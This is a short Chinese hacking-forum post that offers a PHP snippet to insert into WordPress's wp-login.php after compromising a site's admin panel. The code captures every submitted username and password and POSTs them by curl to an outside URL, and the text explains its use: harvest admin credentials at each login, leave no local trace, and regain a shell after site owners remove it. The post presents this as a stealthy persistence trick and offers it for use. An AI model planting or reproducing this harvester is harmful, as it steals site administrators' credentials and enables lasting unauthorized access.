|
|
- if ($_POST['log']!='' && $_POST['pwd']!=''){
- $postdata = "data=".$_POST['log'].'----'.$_POST['pwd']."\r\n";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://www.baidu.com/dict.php");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
- curl_exec($ch);
- curl_close($ch);
- }
代码如上,总所周知只要搞进普通WordPress后台就可以很轻松从插件拿shell,各种你一句话什么的。。。
当然,聪明的站长很多。所以你要做好shell会掉的心理准备。那我们就在wp-login.php再插如上代码进去就可以了
- -每登录一次记录一次,而且不存本地。。。管理员一登录大伙们又留shell去- -,而且姿势不错,,,哪个管理员会蛋疼的去翻登录页面的代码呢。。。
至于代码插哪里,自己看着办,会一两门编程的大概都懂了。。。。这些猥琐淫荡的小技巧公布出来而已。要写出来相信很多人都能写出来。。。 |
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2014-6-1 12:51:36
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡